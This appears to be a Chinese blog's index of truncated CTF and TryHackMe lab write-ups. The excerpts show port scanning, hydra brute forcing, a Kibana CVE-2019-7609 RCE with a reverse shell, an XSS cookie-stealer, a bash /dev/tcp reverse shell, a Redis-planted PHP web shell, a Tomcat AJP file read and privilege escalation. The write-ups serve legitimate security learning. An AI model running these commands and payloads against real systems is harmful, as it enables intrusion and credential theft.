MikannseのSekai

端口扫描 ftp发现不能匿名登录，那攻击点就只剩下80端口了（对22端口直接进行攻击比较少） Web 进/assets目录看一下 一个rickrolled,难绷，看一下css文件 告诉了我们/sup3r_s3cr3t_fl4g.php 弹出一个警告框后发现跳转到了youtube，盲测是rickrolled，建议我们关掉js 火狐浏览器关闭JS 再次进入界面发现播放了刚刚那文件夹里的mp4文件，说视频中有Hint 因为之前访问那个php时有重定向，所有想先抓个包试试（网络太卡视频根本放不起来） 在第二个包中找到提示 GET /intermediary.php?hidden_directory=/WExYY2Cv-qU HTTP/1.1 访问/WExYY2Cv-qU 找到一张图片，额不会还有隐写罢。。。先把图wget下来 Getshell直接strings，发现有提示，告诉了一个FTP的用户名，然后一堆密码 创建一个密码字典，看样子要我们爆破了，可以用hydra,指定用户名来爆破 hydra -l ftpuser -P password.txt ftp://10.10.86.23 ...

端口扫描最近连thm的网络好像不太稳，nmap扫描也出了点问题。。。 Web 这界面和之前打的vulnhub那台好像，提示了cap的提权方式？ 扫目录没扫出什么东西，80端口就是没什么东西 搜了一下5601端口，发现是一个叫做kibana的服务，和这个房间的名字挺符合，访问看一下 进了一个管理界面 先看房间的第一个问题 在这个界面找到版本号 Getshell能直接搜到CVE https://github.com/LandGrey/CVE-2019-7609 开启监听 python2 CVE-2019-7609-kibana-rce.py -u http://10.10.234.34:5601 -host 10.14.52.15 -port 1234 --shell 成功连接 user.txt THM{1s_easy_pwn3d_k1bana_w1th_rce} 提权既然房间都提示那么明显了，就是用cap文件来提权 getcap -r 来递归列举全部cap文件 但最好把报错信息丢弃 getcap -r / 2>/dev/null 能用python3，直接 / ...

端口扫描 Webgobuster dir -u http://10.10.128.25/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50 简单扫下目录 进主页翻了一下有一个登录和注册页面 /robots.txt进去一看告诉我们有一个/admin页面，但是进去提示未授权无法进入 尝试’ ，发现登录界面也没有注入点。那就想试着先注册一个账号登录 发现可以向管理员发送报告然后管理员会审查，像这种留言形式东西就试着看看有无XSS 在list界面提交一个XSS测试语句，提交后发现弹框，说明存在漏洞 按下F12，在网络界面我们可以看到当前账户有一个cookie，也就是说如果获取到管理员的cookie我们就能伪造管理员身份，而XSS漏洞正好能做这种事 https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py 下载窃取cookie的Python脚本，原理是在本地开启一个服务器，然后管理员处理我们发 ...

端口扫描 Web打开网页，http和https的内容应该是一样的，是一个不明所以的内容，下面那些字母有点像化学元素？ 先扫一下目录 gobuster dir -u http://10.10.11.77/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 gobuster dir -u http://10.10.11.77/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50 看了下WP 然后对照元素周期表列出原子序号 47 80 73 51 84 46 80 78 103 放cyberchef转ASCII码发现是一个文件，所以隐藏文件就是/PI3T.PNg 问谁是文件的创造者 先用wget把文件下下来 exiftool PI3T.PNg 可以查看图片信息，作者是Piet Mondrian 然后就是有一个叫做Piet的编程语言，用位图来写？相当抽象 根据THM提示 ...

端口扫描主机发现开启靶机后 sudo nmap -sn xxx.xxx.xxx.0/24 额外新增加主机的就是要进行渗透测试的机器 Web目录扫描一下80端口 这个manual目录倒是没什么东西，倒是在根目录发现了这一串注释 CTF常见的brainfuck编码，在线网站解下 https://www.splitbrain.org/services/ook .2uqPEfj3D<P’a-3 不知道有啥用，回到之前nmap扫到的CVE看看 登录20000端口看一下，需要输入用户名和密码 在端口扫描可以看到有SMB服务（139和445端口），我们可以用enum4linux来列举一下用户 enum4linux -a 192.168.162.140 发现一个叫cyber的用户 那我们用这个用户名和上面得到的密码来登录 Getshell找了一圈没找到上传文件的地方，结果发现有可以直接调用终端的地方 即便如此还是习惯用反弹shell，kali中开启监听，然后在web端的终端中执行 /bin/bash -i >& /dev/tcp/attack/port 0& ...

端口扫描 开放了http服务,但是扫不出任何东西。还有一个数据库，说实话这个redis数据库不是特别了解 上WP。。。 Getshell下载一个redis-cl,是redis的命令行管理工具 sudo apt-get install redis-tools redis-cli -h ip 进行连接 info可以查看一些信息 稍微学了一点redis的东西 我们首先将redis的工作目录设置在apache的html(nmap扫描结果可以得知是一个apache服务器) config set dir /var/www/html config set dbfilename shell.php 设置一个名叫shell.php的持久化文件，持久化应该是redis数据库的一个特性，这块知识之后再去补 set test "<?php system($_GET['cmd']); ?>" 设置一个键值对，键名为test,内容我们简易地先设为一句话木马测试一下 最后输入save将数据保存在持久化文件中 然后我们在浏览器中访问/shell.php,用cmd参数传一些命令上去看看 发现是 ...

扫了下端口，发现只有22和80两个端口 flag1(文件包含)先扫一下目录，因为要找flag，所以搜索一下php,html,txt之类的文件 gobuster dir -u http://10.10.102.87/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 gobuster dir -u http://10.10.102.87/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 60 登录进来发现是一个选择，随便选一个 因为发现有传参，试试看是否存在注入，发现报错，所以存在注入 还试了一下文件包含，发现没有，那就想试着用sqlmap跑跑看，发现也跑不出来 目录扫出来一个flag.php 想直接访问来着，发现是一片空白，读不出来，可能没有显示PHP的代码，那就试着用伪协议来读 提示说只能有狗或者猫，之前貌似做过这个，需要URL里出现dog或者cat 那就访问 ht ...

端口扫描 Web8080端口登进发现是一个tomcat的网页 扫目录也只是扫出这三个 根据提示是一个CVE-2020-1938 下载POC https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC python3 ajpShooter.py http://10.10.152.114:8080 8009 /WEB-INF/web.xml read 可能读取服务器的配置文件 找到了一个用户名和密码 skyfuck:8730281lkjlkjdqlksalks Getshellssh登录，发现家目录里面有两个文件 cat /etc/passwd 发现还有一个叫merlin的用户，大概率是要转移到他那边 用scp将那两个文件下载到kali，应该是一个GPG文件还有那对应的密钥 发现导入密钥时还要密码 那就用john来爆破 gpg2john tryhackme.asc >hash.txt 将密钥转成可爆破的hash gpg --import tryhackme.ascgpg --decrypt-file creden ...

端口扫描 Web先扫一下目录 让我们keep going 在/r的基础下再扫 然后一直扫之后 来到了/r/a/b/b/i/t目录，在这基础上也扫不出目录了 Getshell右键查看源代码，难绷的是直接给了ssh的用户密码 alice:HowDothTheLittleCrocodileImproveHisShiningTail 然后直接就登陆了，啊这 看一下，发现还有其他几个看起来比较重要的用户 alice的家目录里有一个不可以访问的root.txt和一个python脚本，这个脚本的作用只是将这首诗随机选10行输出出来，大概没什么用，不得不说这个房间的氛围感拉满233 sudo -l 发现alice能以rabbit的身份执行这个Python脚本 没啥思路，看了下WP，用的是python的库劫持，新知识点。因为所执行的Python脚本导入了random的库，实际上也就是导入了random.py这个文件，而且python的一个特性是寻找最近的文件，也就是说我们在/home/alice这个目录下建一个名叫“random.py”的文件也就是最近的文件了，会执行它,random.p ...

端口扫描 基本上是先从21,80端口入手了，先去80看看 Webgobuster dir -u http://10.10.169.214/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 一边日常挂着扫目录，然后我们看看网页 到后面发现扫不出啥东西。。。 从nmap扫出来的两个页面看看 icons应该是存放一些图标图片什么的，没太多有用的信息 backups里面 下载得到一个gpg文件和一个私钥 gpg -d CustomerDetails.xlsx.gpg 发现要密码，上网搜了一下，要先导入私钥 gpg --import priv.key gpg --decrypt-file CustomerDetails.xlsx.gpg 解出一个Excel文件，kali里面好像打不开，我是在windows主机里打开的 发现是三个客户名称？ 发现ftp不能匿名登录，那就试着用得到的三个用户来登录 发现用paradox能成功ftp登录，在ftp登录后最好输入“binary”，来写换成二进制模式来下载文件，否 ...

端口扫描 Nmap扫描还是得多扫几次，第一次扫出来没有结果 Web 打开看了一下，大概是一个密码管理软件？说密码复用什么7788的 Gobuster爆破一下目录，我们再随便翻一下有没有什么有用的信息 在AboutUs界面 能找到他们工作人员的名字，可能可以当做用户名，记录一下 Ninja - Lead Developer Pars - Shibe Enthusiast and Emotional Support Animal Manager Szymex - Head Of Security Bee - Chief Drinking Water Coordinator MuirlandOracle - Cryptography Consultant 在/admin可以找他们的后台，那就试着用Ninja当用户名爆破一下密码 hydra -l Ninja -P /usr/share/wordlists/rockyou.txt 10.10.226.91 http-post-form "/api/login:username=^USER^&password=^PASS^:Inc ...

端口扫描 Web打开80端口是一些不明所以的界面，花里胡哨的很符合对嗨客的印象（ 用gobuster扫一下目录 gobuster dir -u http://10.10.155.86/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 扫出来的大概是这些目录，每个目录都要简单的翻一下 在/robots目录可以找到两个文件，访问看看 第二个文件就是key1 073403c8a58a1f80d943455fb30724b9 第一个下载完打开感觉像是密码的字典？ 既然有wordpress，那就上WPscan扫一下 wpscan --url http://10.10.155.86/ 可以看到主题又是这个熟悉的twentyfifteen 本来想着是不是wordpress的用户名是user，然后指定用户名去爆破密码的，发现爆不出来 看了下WP，在登录界面，会提示用户名是否正确，用户名不存在则会提醒Invalid username，存在则会提醒密码不正确，根据这个特性，可以用burpsuite来测试用户名，利用 ...